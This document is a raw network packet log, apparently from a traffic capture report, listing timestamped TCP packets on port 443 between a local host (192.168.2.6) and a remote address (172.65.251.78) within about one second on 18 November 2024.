                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.376297951 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.376310110 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.376348972 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.376741886 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.376760006 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.376838923 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.376849890 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.376893997 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377091885 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377109051 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377165079 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377178907 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377223015 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377326965 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377341986 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377393007 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377403975 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377438068 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377767086 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377782106 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377825022 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377835989 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377861023 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.377883911 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378158092 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378174067 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378245115 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378254890 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378298044 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378572941 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378590107 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378643990 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378654003 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378695965 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378963947 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.378981113 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379048109 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379056931 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379091978 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379548073 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379564047 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379611015 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379631996 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379678965 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379905939 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379920959 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379971981 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.379981041 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380004883 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380023956 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380276918 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380291939 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380337954 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380347967 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380394936 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380496979 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380513906 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380564928 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380573034 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380615950 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380692005 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380707979 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380753994 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380764008 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.380804062 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381035089 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381047964 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381105900 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381115913 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381170034 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381459951 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381474972 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381552935 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381563902 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381577969 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381598949 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381604910 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381618023 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.381715059 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382150888 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382165909 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382230997 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382241964 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382280111 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382447958 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382462978 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382508039 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382517099 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382530928 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382540941 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382549047 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382581949 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382635117 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382647991 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382688046 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382698059 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382811069 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382829905 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382855892 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382864952 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382883072 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382958889 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.382988930 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.383008003 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.383017063 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.383033037 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.383228064 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.383245945 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.383824110 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.383836031 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.417334080 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.417351961 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.417458057 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.417469025 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.417476892 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.417531967 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.417567968 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.417567968 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.417598963 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.418771982 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.418788910 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.418870926 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.418886900 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.418953896 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423511982 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423530102 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423612118 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423626900 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423666954 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423681974 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423683882 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423701048 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423707008 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423732042 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423937082 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.423953056 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.424016953 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.424031019 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.424082994 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.465449095 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.465470076 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.465671062 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.465742111 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.465826035 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.490752935 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.490771055 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.490854979 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.490869999 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.490911007 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.491858006 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.491875887 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.491935968 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.491944075 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.491977930 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.492685080 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.492702007 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.492749929 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.492758036 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.492790937 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.493501902 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.493515968 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.493583918 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.493591070 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.493676901 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.493937969 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.493952990 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.493990898 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.493999004 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.494023085 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.494090080 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.494596004 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.494611025 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.494656086 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.494663000 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.494695902 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.495203018 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.495218039 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.495264053 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.495277882 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.495310068 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.495776892 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.495791912 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.495839119 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.495850086 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.495896101 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496117115 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496136904 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496176958 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496186972 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496220112 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496470928 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496484995 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496529102 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496536970 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496572971 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496889114 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496903896 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496959925 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.496968985 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497004032 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497133970 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497148991 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497194052 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497203112 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497234106 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497883081 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497898102 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497939110 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497951984 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497968912 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.497983932 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.498359919 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.498374939 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.498462915 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.498485088 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.498524904 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.498827934 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.498842955 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.498894930 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.498905897 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.498940945 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499097109 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499113083 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499152899 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499161959 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499188900 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499203920 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499388933 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499404907 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499459028 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499469042 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499505997 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499778032 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499793053 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499842882 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499850988 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.499893904 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500143051 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500159979 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500206947 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500216007 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500252008 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500395060 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500453949 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500463963 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500473022 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500502110 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500514030 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500514030 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500524998 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500561953 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500572920 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500710011 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500724077 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500771999 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.500782013 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501030922 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501043081 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501085043 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501097918 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501396894 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501410007 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501451969 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501461983 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501482010 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501635075 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501648903 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501693964 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501703024 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501844883 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501859903 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501903057 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501910925 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501929045 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501979113 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.501992941 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.502026081 CET49752443192.168.2.6172.65.251.78
